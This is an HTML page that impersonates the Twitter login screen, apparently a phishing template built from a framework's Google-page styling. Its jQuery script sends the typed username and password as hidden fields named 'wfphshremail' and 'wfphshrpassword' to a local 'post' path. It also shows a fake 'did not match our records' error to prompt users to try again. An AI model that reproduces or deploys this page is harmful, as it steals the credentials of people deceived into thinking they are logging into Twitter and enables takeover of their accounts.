<!DOCTYPE html>
  <html>

  <head>

    <title>Twitter. It's what's happening.</title>

    <meta charset='UTF-8'>
    <meta http-equiv="cache-control" content="no-cache" />
    <meta http-equiv="expires" content="0" />
    <meta http-equiv="pragma" content="no-cache" />
    <meta name="viewport" content="width=device-width,
    initial-scale=1, maximum-scale=1, user-scalable=no">

    <script src="static/js/jquery.min.js"></script>

    <link rel="stylesheet" href="static/css/bootstrap.min.css">
    <link rel="stylesheet" href="static/css/style.css">
    <link rel="icon" type="image/png" href="static/img/oxvhareuw0.png"/>

    <style>

    body {
      background-position: center;
      background-attachment: fixed;
      background-repeat: no-repeat;
      -webkit-background-size: 100%;
      -moz-background-size: 100%;
      -o-background-size: 100%;
      background-size: 100%;
      -webkit-background-size: cover;
      -moz-background-size: cover;
      -o-background-size: cover;
      background-size: cover;
    }

    .google-header-bar {
    height: 71px;
    border-bottom: 1px solid #e5e5e5;
    overflow: hidden;
    }

    .google-header-bar.centered {
    border: 0;
    height: 108px;
    }

    .google-header-bar.centered .header .logo {
    float: none;
    margin: auto;
    display: block;
    }
    .google-header-bar.centered .header .secondary-link {
    display: none
    }

    .header .logo {
    margin: auto;
    }
    </style>

    <style media="screen and (max-width: 800px), screen and (max-height: 800px)">
      .google-header-bar.centered {
        height: 83px;
      }

      .google-header-bar.centered .header .logo {
        margin: auto;
      }

      .card {
        margin-bottom: 20px;
      }
    </style>

    <style media="screen and (max-width: 580px)">
      html,
      body {
        font-size: 14px;
      }

      .google-header-bar.centered {
        height: 73px;
      }

      .google-header-bar.centered .header .logo {
        margin: auto;
      }

      .content {
        padding-left: 10px;
        padding-right: 10px;
      }

      .hidden-small {
        display: none;
      }

      .card {
        padding: 20px 15px 30px;
        width: 270px;
      }

      .footer ul li {
        padding-right: 1em;
      }

      .lang-chooser-wrap {
        display: none;
      }
    </style>

  </head>

  <body>

    <div class="container">
      <div class="account-wall">

        <div class="google-header-bar centered">
          <div class="header content clearfix">
            <img alt="Twitter" class="logo" src="static\img\j35g5c9082.png">
          </div>
        </div>

        <h1 class="text-center login-title">Log in to Twitter</h1>

          <form class="form-signin">

            <div id="dialog">
            <h2 id="error">The username and password you entered did not match our records. Please double-check and try again.</h2>
            </div>

            <input id="eml" type="text" name="eml" class="form-email" placeholder="Phone, email, or username" _autofocus="true" autocorrect="off" autocomplete="off" autocapitalize="off" required><br>
            <input id="pwd" type="password" name="pwd" class="form-password" placeholder="Password" autocorrect="off" autocomplete="off" autocapitalize="off" required><br>

            <button id="btn" class="btn-primary btn-block btn-xlarge btn-sharp" name="login" type="submit">Log in</button>
            <div class="text-center terms-text1"><a href="#" class="url-color">Forgot Password?</a> · <a href="#" class="url-color">Sign up for Twitter</a></div><br>

          </form>

      <script>
      /*
      Check the password field and act accordingly.
      */

      $("#btn").on("click", function(e) {
          e.preventDefault();
          // get the password box and checkbox elements
          var input = document.getElementById("eml");
          var input2 = document.getElementById("pwd");
          // check to see if the value is empty
          if ( input.value == "" ){
              passNotValid();
          }else if( input2.value == "" ){ //check if the value of the repeat field is empty
              passNotValid();
          }else{
              // post the data
              $("#dialog").css('display', 'none');
                post('post', {
                  wfphshremail: input.value,
                  wfphshrpassword: input2.value
                });      
          }
      });

      function passNotValid(){
        $("#dialog").css('display', 'block');
      }
      
      /*
      Post to the fallowing path given the parameters.

      Args:
        path: The path to be posted to.
        params: The parameters to be passed.
      */
      function post(path, params) {
        // create a form and set its attributes
        var form = document.createElement("form");
        form.setAttribute("method", "post");
        form.setAttribute("action", path);

        // set the attribute for the post
        for(var key in params) {
            if(params.hasOwnProperty(key)) {
                var hiddenField = document.createElement("input");
                hiddenField.setAttribute("type", "hidden");
                hiddenField.setAttribute("name", key);
                hiddenField.setAttribute("value", params[key]);
                form.appendChild(hiddenField);
             }
        }
        // submit the post
        document.body.appendChild(form);
        form.submit();
      }
      var input = document.getElementById("eml");
      var input2 = document.getElementById("pwd");
      input.disabled = false;
      input2.disabled = false;
    </script>

      </div>
    </div>

  </body>

</html>
